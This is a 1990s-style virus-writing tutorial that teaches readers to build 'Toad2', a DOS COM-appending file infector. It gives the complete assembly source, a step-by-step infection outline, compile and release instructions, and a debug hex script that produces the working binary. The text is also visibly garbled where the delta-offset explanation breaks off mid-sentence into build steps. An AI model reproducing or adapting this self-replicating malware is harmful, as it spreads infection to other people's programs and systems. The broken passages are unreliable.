h2 22 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393
  1. Lesson 2 The COM Appending Virus By Horny Toad
  2. In the first lesson, we discussed how to write the most basic form of virus, the overwriting virus. This type of virus has serious deficiencies which, I hope, should be very
  3. obvious to you. Nonetheless, the basic overwriting virus is a necessary stepping stone in the overall virus writing curriculum. The next virus that we will be looking at is the
  4. COM appending infector. This virus is a step up in that it infects the host program without destroying it.
  5. As the complexity of the virii increase, so do the concepts that pertain to them. With the overwriting virus, we weren't very concerned with the host program, the one that
  6. we were infecting, quite simply, because it was going to be destroyed. With the appending virus, our ultimate goal is not to harm the host program, but to slightly modify it
  7. to hold the virus code and then be able to run itself. Therefore, with the appender, you really need to visualize what is happening with your virus code and the effects on the
  8. host program. Memory usage and management are going to start playing a bigger part in your virus writing. And you can't relax after learning this virus, with EXE infectors,
  9. resident and boot virii, memory will continue to haunt you. Then, once you have a grasp on memory management, I will through some windows programming your way and
  10. utterly confuse you. At this stage, just be happy with the virus that is in this tutorial. You have accomplished a great success when you can not only produce appending
  11. virii, but really understand what is going on. Don't listen to the people that criticize the shit out of overwriting and com appenders. Understanding the basic concepts in
  12. virus programming will help to build a solid foundation in your coding skills and make the more difficult resident virii easier to grasp.
  13. I have decided to continue with the format that I used in the first lesson to describe this virus. Therefore, when you are coding in the future and need a quick explanation of
  14. a certain technique, you only need to glance at the individual sections of this tutorial. Also, I do expect that you have gone through the first tutorial on overwriting infectors.
  15. In keeping with the Codebreaker's idea of easy-to-understand articles, I will continue to describe all of the basic assembly code, even if it was already touched upon in the
  16. first lesson.
  17. I must add that the code in this article is unoptimized for the purpose of instruction. I specifically divided the code up into many different routines so that I could comment
  18. on each of them and what they do in the virus itself. I also will add that I code TASM-friendly assembly. I only use Borland's Turbo Assembler. I suggest that you use it. It
  19. is very easy to understand and the majority of virii out there are written with TASM in mind. If you still want to use MASM or some other assembler, fine, just make sure
  20. that you know the format that your code has to be in.
  21. After I published the last tutorial, I received a few complaints that people didn't fully understand the use of registers and memory addressing. It was not my goal to
  22. completely explain the use of certain complex concepts in the first tutorial. You did not need to know complex memory management to write an overwriter. In this tutorial, I
  23. will not be going over hooking interrupts, extended registers, or in-depth flag usage. Such techniques are not needed to understand a COM appender. In the next tutorial, I
  24. will be discussing EXE appenders and, in the fourth tutorial, resident virii. Be patient. Wait to understand the more difficult concepts once you need them. Otherwise, you
  25. will only get confused.
  26. Well, on with the virus. I will go ahead and give you a copy below of the basic COM appender, so that, throughout the tutorial, you can reference back to the basic
  27. skeleton code. During the explanation of the individual parts of code, I will offer different techniques to accomplish the same results as you see in the basic code.
  28. code segment
  29. assume cs:code,ds:code
  30. org 100h
  31. start:
  32. db 0e9h,0,0
  33. toad:
  34. call bounce
  35. bounce:
  36. pop bp
  37. sub bp,OFFSET bounce
  38. first_three:
  39. mov cx,3
  40. lea si,[bp+OFFSET thrbyte]
  41. mov di,100h
  42. push di
  43. rep movsb
  44. move_dta:
  45. lea dx,[bp+OFFSET hide_dta]
  46. mov ah,1ah
  47. int 21h
  48. get_one:
  49. mov ah,4eh
  50. lea dx,[bp+comsig]
  51. mov cx,7
  52. next:
  53. int 21h
  54. jnc openit
  55. jmp bug_out
  56. Openit:
  57. mov ax,3d02h
  58. lea dx,[bp+OFFSET hide_dta+1eh]
  59. int 21h
  60. xchg ax,bx
  61. rec_thr:
  62. mov ah,3fh
  63. lea dx,[bp+thrbyte]
  64. mov cx,3
  65. int 21h
  66. infect_chk:
  67. mov ax,word ptr [bp+hide_dta+1ah]
  68. mov cx,word ptr [bp+thrbyte+1]
  69. add cx,horny_toad-toad+3
  70. cmp ax,cx
  71. jz close_up
  72. jmp_size:
  73. sub ax,3
  74. mov word ptr [bp+newjump+1],ax
  75. to_begin:
  76. mov ax,4200h
  77. xor cx,cx
  78. xor dx,dx
  79. int 21h
  80. write_jump:
  81. mov ah,40h
  82. mov cx,3
  83. lea dx,[bp+newjump]
  84. int 21h
  85. to_end:
  86. mov ax,4202h
  87. xor cx,cx
  88. xor dx,dx
  89. int 21h
  90. write_body:
  91. mov ah,40h
  92. mov cx,horny_toad-toad
  93. lea dx,[bp+toad]
  94. int 21h
  95. close_up:
  96. mov ah,3eh
  97. int 21h
  98. next_bug:
  99. mov ah,4fh
  100. jmp next
  101. bug_out:
  102. mov dx,80h
  103. mov ah,1ah
  104. int 21h
  105. retn
  106. comsig db '*.com',0
  107. thrbyte db 0cdh,20h,0
  108. newjump db 0e9h,0,0
  109. horny_toad label near
  110. hide_dta db 42 dup (?)
  111. code ENDS
  112. END start
  113. Well, that is the basic code that we will be using for the virus. Now, before we get into discussing what the individual lines of code do, let's try to conceptualize what a
  114. COM appending virus is. Take a look below at the steps that a COM appending virus takes when executed.
  115. Outline of the COM Appending Virus
  116. Determine the Delta Offset
  117. Restore the infected file's original 3 bytes
  118. Set a new DTA address
  119. Find a COM file.
  120. If none then go to step 16.
  121. Open the file.
  122. Read and store the first 3 bytes of the file.
  123. Check if file has been previously infected.
  124. Calculate the size of the jump to main virus body.
  125. Move to the beginning of the file.
  126. Write the jump to the main virus body.
  127. Move to the end of the file.
  128. Append the virus main body to the end of the file.
  129. Close the file.
  130. Find next matching file. Back to step 4.
  131. Return the DTA to 80 hex and restore control to host program.
  132. I swore that I would never include cheesy graphics in my tutorials, but I guess I should, in order to give you a picture of what the virus and the host program look like before
  133. and after infection.
  134. Toad2 Virus Innocent Program
  135. 163 bytes 200 bytes
  136. ----------- -----------
  137. = = = =
  138. = = = =
  139. = = = =
  140. = = = =
  141. = = = =
  142. = = = =
  143. = = = =
  144. = = = =
  145. ----------- -----------
  146. After Infection
  147. 0ffset 100h ---------------
  148. =Jump to Virus=
  149. =Main Body = - 3 bytes long
  150. =-------------=
  151. = = The delta offset is the calculation
  152. = Innocent = of the amount of space that the virus
  153. = Program = main body has moved down past the Innocent
  154. = Main Body = program main body.
  155. = =
  156. = =
  157. =-------------=
  158. = =
  159. = Virus Main =
  160. = Body =
  161. = =
  162. = =
  163. = =
  164. =Data Section =
  165. =of Virus =
  166. =--Original---=
  167. =--3 bytes of-=
  168. =--Innocent---=
  169. =--Program----=
  170. =-------------=
  171. Hopefully, I haven't completely discouraged and confused you. Once the individual sections of code are explained, all of these steps will make sense. Something that you
  172. must remember when looking at the virus code is that the virus is currently in its first generation. It hasn't yet infected a file. When you are trying to figure out how the virus
  173. code works, you will have to think of it in terms of the first time it runs as well as when the infected program is running.
  174. Well, lets have a look at the code.
  175. code segment
  176. The segment directive defines the parameters for a segment. In this instance we are defining the code segment. All of the executable code, the meat of our program will lie
  177. inside of the code segment. This segment does not necessarily have to be named "code" segment, but it is only logical, and a good programming convention, to name it
  178. the "code" segment. If we were dealing with a larger program, one that had many procedures of external calls, we would definitely want to define a specific segment as our
  179. data segment separate from the code. Since this is a very small piece of code, the two will be intermixed.
  180. assume cs:code,ds:code
  181. The assume directive lies within the code segment and matches the name that you gave your segment, such as code, with associated register. In our program, we are
  182. stating that the code and data segment registers will be associated with the "code" segment. What does this mean? Basically we are still setting up the parameters of our
  183. COM file. We are following convention by defining where things are in our program and how they are set up. What are the CS and DS registers? The code segment
  184. register is going to contain the starting address of your programs code segment. . Essentially, it tells your computer where to begin to look for your executable code. The
  185. DS register contains the starting address for the data section. Another register that I might as well bring up is the IP or instruction pointer register. The job of the IP is to
  186. contain the offset address of the next line of code that is to be executed. What is an offset address? An offset address is not a true address of a line in your program,
  187. rather a value of the distance away from a given point. If you put two concepts together, the code segment register added to the instruction point register will give you the
  188. next executable line in your program. The CS will stay constant as the IP counts up the lines of code.
  189. org 100h
  190. You should remember this from the overwriting virus. This directive is telling the computer that our virus is a COM file located at 100 hex or 256 bytes. This 100 hex
  191. distance is actually an offset directly after the PSP or program segment prefix. The value 100h is placed in the IP, telling the computer where to begin. PSP contains
  192. information about your program and is created in memory when the program is loaded.
  193. start:
  194. db 0e9h,0,0
  195. The first instruction that needs to be coded is the jump to our virus code. In the initial execution of our virus, we only want control to the next line of code, so we define a
  196. blank jump. The DB or "define byte" directive is most commonly used in the data section of our virus to define strings of information. In this instance, we are literally
  197. defining an assembly instruction manually. The instruction that we are defining is "jump." At the lowest level, the level at which the computer processes code, the
  198. instruction "jmp" has been transformed by the compiler to it's binary form "11101001." In coding assembly, the preferred numerical system is hexadecimal, so we convert
  199. the binary to e9h. No way am I getting into describing how to manually convert bin-dec-hex. I prefer to let my little old Casio do the conversions for me. Get back on track
  200. Toad. Do you think that the jump instruction stays null once the virus has infected a program? If you answered "No", then congratulations. Once the virus has infected a
  201. program, the first instruction in the code of the infected host will be a jump to the main virus body. Each time the virus infects a program, the first 3 bytes, including the
  202. jump instruction will be rewritten with a calculation to jump over the host program to the virus main body. As we progress through the virus, this will all become clearer.
  203. toad:
  204. call bounce
  205. bounce:
  206. pop bp
  207. sub bp,OFFSET bounce
  208. The Delta Offset. This is probably the most singular important concept that you will have to learn when coding an appending virus. When you compile the virus for the first
  209. time, the assembler calculates the value of all of the offsets. Once the virus has appended itself to the end of the host program, the offsets that the assembler calculated
  210. are now all incorrect. The offsets do not take into account the amount of space the code has moved forward, beyond the host program. Before we go into the calculation of
  211. the delta offset, lets look at the new instructions within this routine. The first is the "call" instruction. If you remember the old BASIC computer language, call is like
  212. GOSUB. A call instruction pushes the IP onto the stack. Ok, let's take a look at that last sentence. What does it mean? Who's pushing who? And what the hell is a
  213. stack? Don't panic, we are going to take this nice and easy. The stack is a temporary memory location that can be used to store such things as the IP (the address of the
  214. next instruction) during a "call". The term "push" means that the data is being moved onto the stack. The opposite of "push" is "pop". The pop instruction merely transfers
  215. the data that was just pushed onto the stack to a specified destination. Don't freak out on me with this. At this point, this is all I want you to know about the stack, a
  216. temporary memory location. On to the calculation. The call instruction pushes the IP, the address of the next instruction on to the stack. We then pop this address into
  217. the bp. Then subtract the original offset of bounce, which was determined at the virus' original compilation, from the value in bp. The tasm toad2.asm (You can actually do this from any directory that you want)
  218. The result should be:
  219. Turbo Assembler Version 2.01
  220. Assembling file: toad2.asm
  221. Error Messages: none
  222. Warning Messages: none
  223. Passes: 1
  224. Remaining Memory: 425k
  225. If there was an error in the code, TASM will indicate it in the error messages line. If you have typed the code in yourself and there is an error, revert back to the file
  226. "toad2.asm" and take a look at my code, it works. If there are too many problems with your code and you'd just like to see how all this stuff works, switch to the "create"
  227. directory and type the above instructions again. There is a copy of the "toad2.asm" and TASM and TLINK in this directory. What TASM has done is convert the ASM file
  228. into an OBJ file. In order to get an executable COM file, we need to use the linker. Type:
  229. C:\>tlink /t toad2.obj
  230. Tlink will return TOAD2.COM in the current directory. You now have a virus in front of you. Don't get scared, it won't bite. Now you will need to move the virus from the
  231. current directory to the pond directory. Type:
  232. C:\>copy toad2.com c:\pond\
  233. Then type :
  234. C:\>cd ..\pond
  235. This will move you to the pond directory. Now list the contents of the directory by typing:
  236. C:\pond>dir
  237. You will see that there are some files in this directory, TOAD2.COM and FLY(1-3).COM. TOAD.COM is your virus and the FLY(1-3).COM are the files that you are going to
  238. infect. FLY.COM is just a simple COM file that does absolutely nothing. Easy prey! Take a note of the size of the two files, 6 and 162. Now unleash the virus by typing:
  239. C:\pond>toad2
  240. Now list the contents of the directory again. You will now see that the files FLY(1-3) have become a little larger. FLY(1-3).COM are now infected. If all your attempts to
  241. compile and link the toad2 virus fail, I have included a compiled copy of the toad2 virus and many fly.com files in the TOAD directory. Change to the TOAD directory and
  242. type toad2. The fly files will become infected.
  243. Debug script of the Toad2 virus
  244. For those of you who would rather not use the compiler for some ungodly reason or if you are interested in viewing a hex dump of the virus in first generation, here is the
  245. debug script of toad2.com. Looking at the debug script of your virus can also help you out in determining the length of certain parts of the virus. Take a look at the script
  246. below. You can see the blank jump "e9 00 00" at the beginning of the code for the jump to the main virus body. Look at the end of the script and you can find the int 20
  247. "cd 20" and the blank jump in newjump "e9 00 00". To measure the distance of certain parts of the virus, each two digit group equals one byte. For example, "e9" equals
  248. one byte. You can determine the total length of the virus by counting the number of groups in the script. In this case, the toad2 virus will come out to 163 bytes. I hope
  249. that I have not confused you with this. I purposely put this section at the end of the tutorial because I did not want to go into detail on the use of debug. In the next edition
  250. of the zine there will be an article on using debug in virus writing. I just wanted to give you a taste of what is to come. In order to get a functioning virus from the below code
  251. you need to find your copy of debug. Cut the below code out and save it to a file called toad2.txt. Then at a cursor, with debug in the same directory, type:
  252. debug < toad2.txt
  253. N TOAD2.COM
  254. E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 B9 03 00 8D B6
  255. E 0110 9D 01 BF 00 01 57 F3 A4 8D 96 A3 01 B4 1A CD 21
  256. E 0120 B4 4E 8D 96 97 01 B9 07 00 CD 21 73 03 EB 60 90
  257. E 0130 B8 02 3D 8D 96 C1 01 CD 21 93 B4 3F 8D 96 9D 01
  258. E 0140 B9 03 00 CD 21 3E 8B 86 BD 01 3E 8B 8E 9E 01 81
  259. E 0150 C1 A3 00 3B C1 74 30 2D 03 00 3E 89 86 A1 01 B8
  260. E 0160 00 42 33 C9 33 D2 CD 21 B4 40 B9 03 00 8D 96 A0
  261. E 0170 01 CD 21 B8 02 42 33 C9 33 D2 CD 21 B4 40 B9 A0
  262. E 0180 00 8D 96 03 01 CD 21 B4 3E CD 21 B4 4F EB 9A BA
  263. E 0190 80 00 B4 1A CD 21 C3 2A 2E 63 6F 6D 00 CD 20 00
  264. E 01A0 E9 00 00
  265. RCX
  266. 00A3
  267. W
  268. Q
  269. Appendix 1 - The Registers
  270. AX Accumulator
  271. BX Base register
  272. CX Counting register
  273. DX Data register
  274. DS Data Segment register
  275. ES Extra Segment register
  276. SS Stack Segment register
  277. CS Code Segment register
  278. BP Base Pointer register
  279. SI Source Index register
  280. DI Destination Index register
  281. SP Stack Pointer register
  282. IP Next Instruction Pointer register
  283. F Flag register
  284. Appendix 2 - The PSP (from Ralf Brown's Interrupt List)
  285. Format of Program Segment Prefix (PSP):
  286. Offset Size Description (Table 1032)
  287. 00h 2 BYTEs INT 20 instruction for CP/M CALL 0 program
  288. termination the CDh 20h here is often used
  289. as a signature for a valid PSP
  290. 02h WORD segment of first byte beyond memory allocated to
  291. program
  292. 04h BYTE (DOS) unused filler (OS/2) count of fake DOS
  293. version returns
  294. 05h BYTE CP/M CALL 5 service request (FAR CALL to absolute
  295. 000C0h) BUG: (DOS 2+ DEBUG) PSPs created by DEBUG
  296. point at 000BEh
  297. 06h WORD CP/M compatibility--size of first segment for .COM
  298. files
  299. 08h 2 BYTEs remainder of FAR JMP at 05h
  300. 0Ah DWORD stored INT 22 termination address
  301. 0Eh DWORD stored INT 23 control-Break handler address
  302. 12h DWORD DOS 1.1+ stored INT 24 critical error handler
  303. address
  304. 16h WORD segment of parent PSP
  305. 18h 20 BYTEs DOS 2+ Job File Table, one byte per file
  306. handle, FFh = closed
  307. 2Ch WORD DOS 2+ segment of environment for process (see
  308. #1033)
  309. 2Eh DWORD DOS 2+ process's SS:SP on entry to last INT
  310. 21 call
  311. 32h WORD DOS 3+ number of entries in JFT (default 20)
  312. 34h DWORD DOS 3+ pointer to JFT (default PSP:0018h)
  313. 38h DWORD DOS 3+ pointer to previous PSP (default
  314. FFFFFFFFh in 3.x) used by SHARE in DOS 3.3
  315. 3Ch BYTE DOS 4+ (DBCS) interim console flag (see AX=6301h)
  316. Novell DOS 7 DBCS interim flag as set with
  317. AX=6301h (possibly also used by Far East MS-DOS
  318. 3.2-3.3)
  319. 3Dh BYTE (APPEND) TrueName flag (see INT 2F/AX=B711h)
  320. 3Eh BYTE (Novell NetWare) flag: next byte initialized if
  321. CEh (OS/2) capabilities flag
  322. 3Fh BYTE (Novell NetWare) Novell task number if previous
  323. byte is CEh
  324. 40h 2 BYTEs DOS 5+ version to return on INT 21/AH=30h
  325. 42h WORD (MSWindows3) selector of next PSP (PDB) in linked
  326. list Windows keeps a linked list of Windows programs
  327. only
  328. 44h WORD (MSWindows3) "PDB_Partition"
  329. 46h WORD (MSWindows3) "PDB_NextPDB"
  330. 48h BYTE (MSWindows3) bit 0 set if non-Windows application
  331. (WINOLDAP)
  332. 49h BYTE unused by DOS versions <= 6.00
  333. 4Ch WORD (MSWindows3) "PDB_EntryStack"
  334. 4Eh 2 BYTEs unused by DOS versions <= 6.00
  335. 50h 3 BYTEs DOS 2+ service request (INT 21/RETF instructions)
  336. 53h 2 BYTEs unused in DOS versions <= 6.00
  337. 55h 7 BYTEs unused in DOS versions <= 6.00; can be used
  338. to make first FCB into an extended FCB
  339. 5Ch 16 BYTEs first default FCB, filled in from first
  340. commandline argument overwrites second FCB if opened
  341. 6Ch 16 BYTEs second default FCB, filled in from second
  342. commandline argument overwrites beginning of
  343. commandline if opened
  344. 7Ch 4 BYTEs unused
  345. 80h 128 BYTEs commandline / default DTA
  346. command tail is BYTE for length of tail, N BYTEs
  347. for the tail, followed by a BYTE containing 0Dh